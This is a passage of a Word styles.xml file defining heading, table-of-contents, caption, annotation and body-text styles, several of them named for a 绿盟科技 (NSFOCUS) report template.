      <w:snapToGrid/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="30">
    <w:name w:val="样式3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00EF6D8D"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="102"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="af5">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DC59DE"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af6">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a4"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00436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1AB4"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLineChars="200" w:firstLine="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:next w:val="2"/>
    <w:link w:val="1Char"/>
    <w:qFormat/>
    <w:rsid w:val="00D71AB4"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:numId w:val="124"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:b/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:next w:val="a3"/>
    <w:link w:val="2Char"/>
    <w:qFormat/>
    <w:rsid w:val="00D71AB4"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="124"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:link w:val="3Char"/>
    <w:qFormat/>
    <w:rsid w:val="00050805"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="124"/>
      </w:numPr>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:adjustRightInd/>
      <w:spacing w:before="260" w:after="260" w:line="416" w:lineRule="auto"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:link w:val="4Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00153F11"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="124"/>
      </w:numPr>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D71AB4"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:b/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="2Char">
    <w:name w:val="标题 2 Char"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="2"/>
    <w:rsid w:val="00D71AB4"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="3Char">
    <w:name w:val="标题 3 Char"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="3"/>
    <w:rsid w:val="00050805"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="黑体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:snapToGrid w:val="0"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ParaCharCharCharChar">
    <w:name w:val="默认段落字体 Para Char Char Char Char"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00D71AB4"/>
    <w:pPr>
      <w:keepNext/>
      <w:tabs>
        <w:tab w:val="num" w:pos="2940"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLineChars="0" w:hanging="420"/>
    </w:pPr>
    <w:rPr>
      <w:snapToGrid/>
      <w:kern w:val="2"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="10">
    <w:name w:val="标题 1（绿盟科技）"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a3"/>
    <w:qFormat/>
    <w:rsid w:val="00050805"/>
    <w:pPr>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:numId w:val="126"/>
      </w:numPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="48" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:before="600" w:after="330" w:line="576" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="Char"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D71AB4"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="文档结构图 Char"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00D71AB4"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a2">
    <w:name w:val="表格题注"/>
    <w:next w:val="a3"/>
    <w:rsid w:val="00DD31AB"/>
    <w:pPr>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:beforeLines="100" w:before="240"/>
      <w:ind w:left="1089" w:hanging="369"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a1">
    <w:name w:val="插图题注"/>
    <w:next w:val="a3"/>
    <w:rsid w:val="00DD31AB"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:afterLines="100" w:after="240"/>
      <w:ind w:left="1089" w:hanging="369"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B93150"/>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B93150"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="批注文字 Char"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="a9"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00B93150"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="a9"/>
    <w:next w:val="a9"/>
    <w:link w:val="Char1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B93150"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="批注主题 Char"/>
    <w:basedOn w:val="Char0"/>
    <w:link w:val="aa"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00B93150"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00B93150"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ac">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="Char2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B93150"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char2">
    <w:name w:val="批注框文本 Char"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="ac"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00B93150"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="11">
    <w:name w:val="附录1（绿盟科技）"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:qFormat/>
    <w:rsid w:val="00D402A3"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:adjustRightInd/>
      <w:spacing w:before="480" w:afterLines="100" w:after="100" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
      <w:b/>
      <w:snapToGrid/>
      <w:kern w:val="2"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="21">
    <w:name w:val="附录2（绿盟科技）"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:qFormat/>
    <w:rsid w:val="00D402A3"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:adjustRightInd/>
      <w:spacing w:beforeLines="50" w:before="50" w:afterLines="50" w:after="50" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
      <w:b/>
      <w:snapToGrid/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="32">
    <w:name w:val="附录3（绿盟科技）"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:qFormat/>
    <w:rsid w:val="00D402A3"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:adjustRightInd/>
      <w:spacing w:beforeLines="50" w:before="50" w:afterLines="50" w:after="50" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:snapToGrid/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="41">
    <w:name w:val="附录4（绿盟科技）"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:qFormat/>
    <w:rsid w:val="00D402A3"/>
    <w:pPr>
      <w:widowControl/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:adjustRightInd/>
      <w:spacing w:beforeLines="50" w:before="50" w:afterLines="50" w:after="50" w:line="240" w:lineRule="atLeast"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
      <w:snapToGrid/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a3"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00B258AD"/>
    <w:pPr>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22">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AB1127"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1260"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8290"/>
      </w:tabs>
      <w:ind w:left="210" w:firstLine="440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002E320E"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1050"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8290"/>
      </w:tabs>
      <w:spacing w:before="120"/>
      <w:ind w:firstLine="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="33">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009165FF"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="1680"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8290"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="atLeast"/>
      <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="42">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B258AD"/>
    <w:pPr>
      <w:ind w:left="630"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="50">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B258AD"/>
    <w:pPr>
      <w:ind w:left="840"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="60">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B258AD"/>
    <w:pPr>
      <w:ind w:left="1050"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B258AD"/>
    <w:pPr>
      <w:ind w:left="1260"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B258AD"/>
    <w:pPr>
      <w:ind w:left="1470"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B258AD"/>
    <w:pPr>
      <w:ind w:left="1680"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ad">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00EC6959"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ae">
    <w:name w:val="正文（绿盟科技）"/>
    <w:link w:val="Char3"/>
    <w:qFormat/>
    <w:rsid w:val="00EC6959"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af">
    <w:name w:val="目录（绿盟科技）"/>
    <w:basedOn w:val="ae"/>
    <w:qFormat/>
    <w:rsid w:val="00EC6959"/>
    <w:pPr>
      <w:spacing w:after="156"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:sz w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char3">
    <w:name w:val="正文（绿盟科技） Char"/>
    <w:link w:val="ae"/>
    <w:rsid w:val="00EC6959"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af0">
    <w:name w:val="正文首行缩进（绿盟科技）"/>
    <w:basedOn w:val="ae"/>
    <w:link w:val="Char4"/>
    <w:qFormat/>
    <w:rsid w:val="00153F11"/>
    <w:pPr>
      <w:spacing w:after="50"/>
      <w:ind w:firstLineChars="200" w:firstLine="200"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="x-none" w:eastAsia="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="20">
    <w:name w:val="标题 2（绿盟科技）"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="ae"/>
    <w:qFormat/>
    <w:rsid w:val="00153F11"/>
    <w:pPr>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:numId w:val="126"/>
      </w:numPr>
      <w:spacing w:before="260" w:after="260" w:line="415" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="31">
    <w:name w:val="标题 3（绿盟科技）"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="ae"/>
    <w:qFormat/>
    <w:rsid w:val="005D6467"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="126"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="960"/>
      </w:tabs>
      <w:spacing w:line="415" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:snapToGrid/>
      <w:kern w:val="0"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="40">
    <w:name w:val="标题 4（绿盟科技）"/>
    <w:basedOn w:val="4"/>
    <w:next w:val="ae"/>
    <w:qFormat/>
    <w:rsid w:val="00153F11"/>
    <w:pPr>
      <w:widowControl/>
      <w:numPr>
        <w:numId w:val="126"/>
      </w:numPr>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:adjustRightInd/>
      <w:spacing w:after="156"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:bCs w:val="0"/>
      <w:snapToGrid/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="5">
    <w:name w:val="标题 5（有编号）（绿盟科技）"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="ae"/>
    <w:qFormat/>
    <w:rsid w:val="00153F11"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="126"/>
      </w:numPr>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:adjustRightInd/>
      <w:spacing w:before="280" w:after="156" w:line="377" w:lineRule="auto"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
      <w:b/>
      <w:snapToGrid/>
      <w:sz w:val="24"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="6">
    <w:name w:val="标题 6（有编号）（绿盟科技）"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="ae"/>
    <w:qFormat/>
    <w:rsid w:val="00153F11"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="126"/>
      </w:numPr>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:adjustRightInd/>
      <w:spacing w:before="240" w:after="64" w:line="319" w:lineRule="auto"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
      <w:b/>
      <w:snapToGrid/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a">
    <w:name w:val="插图标注（绿盟科技）"/>
    <w:next w:val="ae"/>
    <w:rsid w:val="00153F11"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="126"/>
      </w:numPr>
      <w:spacing w:after="156"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a0">
    <w:name w:val="表格标注（绿盟科技）"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="ae"/>
    <w:rsid w:val="00153F11"/>
